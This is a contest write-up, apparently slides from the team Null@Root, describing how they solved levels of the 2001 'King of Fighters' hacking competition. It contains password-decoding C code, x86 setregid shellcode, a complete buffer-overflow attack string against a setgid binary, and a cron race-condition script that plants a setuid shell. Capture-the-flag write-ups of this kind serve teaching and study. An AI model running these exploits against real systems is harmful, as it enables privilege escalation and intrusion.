king of fighters 2001 the best of best hackergroup null@root
TRANSCRIPT
King Of Fighters 2001
The Best of Best HackerGroup Null@Root
• Environment :
Zolazola.exe : P2P Communication Program
• Target :
http://kof.hackerslab.org/cgi-bin/level1/idaccess.cgi
Level 1
- 1 -
2001/09/06
Level 1 (continue)
•Finding Vulnerability–String from zolazola Executable File
•ID : guest•Password : gZuOeLsAt
–Packet sniffing•Server : 203.239.xxx.xxx : 2900•Command list
– KOFLOG, KOFGETLIST, KOFMESSAGE, KOFGETINFO– KOFOK, KOFFRI, KOFPUTERR KOFPUTINFO
- 2 -
2001/09/06
Level 1 (continue)
KOFLOG guest dXtOfNuEy
KOFGTLIST guest
KOFOK 0
KOFPUTERR level1
KOFFRI level1 ROFFRI level2 KOFFRI guest
KOFMSG guest level1 Hi! are you there?KOFGETINFO guest level1
Client PC Server
- 3 -
2001/09/06
Level 1 (continue)
• ATTACKtelnet 203.255.xxx.xxx 2900KOFGETINFO gest guest (I want guest’s information.) KOFPUTINFO guest eYuPgOwFz gZuOeLsAt
KOFGETLIST level2 (Who is level2’s friend?) KOFFRI kof_moniter
KOFGETINFO kof_moniter level2 KOFPUTINFO level2 eDttvdvYQVn [email protected] level2user KOFPUTINFO level2 fEuuwewZRWo [email protected] level2user KOFPUTINFO level2 gFvvxfx[SXp [email protected] level2user KOFPUTINFO level2 eDttvdvYQVn [email protected] level2user
- 4 -
2001/09/06
Level 1 (continue)
•ENCODE
g Z u O e L x A t
E Y u P g O w F z -2 –1 0 +1 +2 +3 +4 +5 +6
g Z u O e L x A t
d X t O f N u E y -3 –2 -1 0 +1 +2 +3 +4 +5
Encode Encode
- 5 -
2001/09/06
• DECODE #include <stdio.h> main(int argc, char **argv) { int i, j, start, stop, dy; int src_len; char *src, ch;
src = argv[1]; src_len = strlen(src); for(i = 0; i < src_len; i++) { for(j = 0, dy = i; j < src_len; j++, dy--) { ch = *(src + j); printf("%c", ch + dy); } printf("\n"); }}
Level 1 (continue)
• Result $ ./dec1 eDttvdvYQVn
eCrqr_pRIMd
fDsrs`qSJNe
gEtstarTKOf
hFutubsULPg
iGvuvctVMQh
jHwvwduWNRi
kIxwxevXOSj
lJyxyfwYPTk
mKzyzgxZQUl
nL{z{hy[RVm
oM|{|iz\SWn
pN}|}j{]TXo
level2’s password
- 6 -
2001/09/06
Level 1 (complete)
Conguratulations!
The IP for the next level is 203.255.xxx.xxx.
And ID is h3047.
- 7 -
2001/09/06
Level 2
•EnvironmentServer :
Linux kernel 2.4.9 (203.255.xxx.xxx)GCC:egcs-2.91.66 199990314/Linux(egcs- 1.1.2 release)
•Target : /usr/local/apache/cgi-bin/idaccess.cgi
- 8 -
2001/09/06
Level 2 (continue)
• Finding Vulnerability/usr/games directory File list drwxrwxr-x 3 root level2 352256 Aug 25 17:50 . drwxr-xr-x 19 root root 4096 Aug 23 22:38 .. -rw-rw---- 1 level2 level2 98 Aug 25 17:50 check -rw-r--r-- 1 level2 level2 763 Aug 25 17:50 score -rw-r----- 1 h3579 level2 0 Aug 25 17:50 score.13210 -rwxr-sr-x 1 root level2 17542 Aug 25 06:20 solveit
- 9 -
2001/09/06
Level 2 (continue)
– Solveit work like this :Input ID : (input id --- upto 129byte)
(123+456)*789-(456+123)*789 = (Input Result)
(nn1+nn2)*nn3-(nn5+nn5)*nn6 = (Input Result) Do you play again(y/n)? (Input Data)
20times
- 10 -
2001/09/06
Level 2 (continue)
• Information from Solveit binary fileID Field input length : upto 129byte, start at ebp + 0xffffff78
0x8048d0d <main+157>: push $0x810x8048d12 <main+162>: lea 0xffffff78(%ebp),%eax0x8048d18 <main+168>: push %eax0x8048d19 <main+169>: push $0x80490050x8048d1e <main+174>: call 0x8048854 <get_input>
(gdb) x/bs 0x80490050x8049005 <_IO_stdin_used+225>: "Input your id: "
Lengthstart position
- 11 -
2001/09/06
Level 2 (continue)
• Last guestion input length is affected by ID Field’s last byte0x8048db7 <main+327>: mov 0xfffffff8(%ebp),%eax0x8048dba <main+330>: push %eax0x8048dbb <main+331>: push $0x80490420x8048dc0 <main+336>: call 0x80488c0 <get_yn>0x8048dc5 <main+341>: add $0x8,%esp
(gdb) x/bs 0x80490420x8049042 <_IO_stdin_used+286>: "Do you play again? (y/n) "
get_yn’s length
- 12 -
2001/09/06
Level 2 (continue)
• Function get_yn use 4byte stackDump of assembler code for function get_yn:0x80488c0 <get_yn>: push %ebp0x80488c1 <get_yn+1>: mov %esp,%ebp0x80488c3 <get_yn+3>: sub $0x4,%esp0x80488c6 <get_yn+6>: push $0x40x80488c8 <get_yn+8>: push $0x00x80488ca <get_yn+10>: lea 0xfffffffc(%ebp),%eax0x80488cd <get_yn+13>: push %eax0x80488ce <get_yn+14>: call 0x8048730 <memset>0x80488d3 <get_yn+19>: add $0xc,%esp0x80488d6 <get_yn+22>: mov 0xc(%ebp),%eax0x80488d9 <get_yn+25>: push %eax0x80488da <get_yn+26>: lea 0xfffffffc(%ebp),%eax0x80488dd <get_yn+29>: push %eax0x80488de <get_yn+30>: mov 0x8(%ebp),%eax0x80488e1 <get_yn+33>: push %eax0x80488e2 <get_yn+34>: call 0x8048854 <get_input>
get_yn’s stuck (4byte)
- 13 -
2001/09/06
Level 2 (continue)
• ATTACK for level2’s gid shell• Modify setreuid shell code to setregid shell code ( setreuid(0,0) - setregid(501,501) )
\x31\xdb\x31\xc9\xf7\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5 \x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68 \x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
• Attack string format [Nop+setregid shell+Nop]+[math quiz answer]+[AAAA][ebp][return Address]
129byte
- 14 -
2001/09/06
Level 2 (continue)
• Attack string(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x31\xc9\xf7\xe3\x66\x81\xc3\xf5\x01\x66\x81\xc1\xf5\x01\xb0\x47\xcd\x80\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x34\x37\x32\x33\x32\x0a\x39\x37\x34\x37\x35\x0a\x35\x31\x30\x30\x33\x0a\x36\x38\x32\x32\x30\x0a\x38\x34\x34\x34\x35\x0a\x34\x32\x33\x30\x31\x0a\x34\x34\x39\x35\x32\x0a\x35\x34\x38\x34\x30\x0a\x37\x35\x31\x31\x30\x0a\x34\x34\x37\x36\x38\x0a\x31\x33\x30\x39\x32\x32\x0a\x34\x32\x36\x37\x36\x0a\x31\x32\x30\x37\x32\x30\x0a\x36\x30\x34\x35\x36\x0a\x31\x31\x31\x39\x35\x31\x0a\x31\x30\x36\x38\x31\x36\x0a\x35\x33\x31\x33\x33\x0a\x38\x35\x31\x38\x31\x0a\x39\x39\x32\x39\x37\x0a\x38\x32\x34\x35\x37\x0a\x41\x41\x41\x41\x58\xfb\xff\xbf\x40\xfc\xff\xbf\x0a"; cat)|./solveit
- 15 -
2001/09/06
Level 2 (continue)
• we could modify main.html of level2 with level2 gid priviledge, but the “Target” need level2 uid.
• Finding other Vulnerability• /us2/games/cheek file.
sh-2.04$ cat checkfor file in /usr/games/score.* ; do /bin/cat $file >> /usr/games/score ; /bi
n/rm -f $file ; done
• level2’s Cron Job do like this :rm checkmake checkdo check
- 16 -
2001/09/06
Level 2 (continue)
• ATTACK for level2’s uid shell /var/spool/cron/crontabs/level2 had race condition.
Cron
rm check
make check
do check
replace check file (include myjob)
- 17 -
2001/09/06
(at every 10 min)
Level 2 (continue)
–Prepared setreuid shell(binary file : /tmp/wsh)main(){
setreuid(501,501);system(“bin/sh”);
}
–Attack script (filename: exp.sh)
echo > /usr/games/check
cp /tmp/wsh /tmp/nullroot; chmod 4755 /tmp/nullroot
./exp.sh
- 18 -
2001/09/06
Level 2 (complete)Congraturation!, You passed level 2. Now challenge level 3 system !!
level3 system's IP adress is 203.255.xxx.xxx
Make your page in /usr/local/apache/htdocs/main.html
귀하의 ID 와 패스워드를 가지고 level3 서버에 telnet 서비스 접속이 가능합니다 .
level3 시스템의 root 권한을 획득한 후 level3 서버내의 idaccess 라는 프로그램을 실행시키시오
Now challenge level 3 system !!
You can connect level 3 system's telnet service,
by using your "Registration Number" and password.
You must get a root privilege, and find a excutable file "idaccess" in any location in level 3 system
After that, if you excute "idaccess" and input your registration information.
then you will get qualification for passing level 3,- 19 -
2001/09/06
Level 3
• Environment :
Server: Solaris 5.8 i386(203.255.xxx.xxx)
GCC: 2.9x
• Target :
??
- 20 -
2001/09/06
Level 3
1. Checking vulnerability
1.1 search known bug
1.2 port scan
1.3 search setuid root file
1.4 boot sequence check
2. Found login problem ( 202byte login ID )
attack string format
[ serial_no(13) + nop(95)+ shell code(93)+return address(4)]
3. we had not enough time to exploit it, so give up level3.. And defence level2’s homepage.
- 21 -
2001/09/06
<After-talk of KOF>- we worried about p2p on the eve of that game.
- level2 was not so easy to solve directly.
- there were no special priviledges to keep main.html of level2.
- player need some attention for their work, script kiddies copied solveit's exploit from /tmp.
- Anybody can get level2's uid by peeking /usr/games/check file.
- level3 was difficult to us because we didn't have so much experience Solaris.
- we thought all of levels were very nice , thanks to hackerslab.
- 22 -
2001/09/06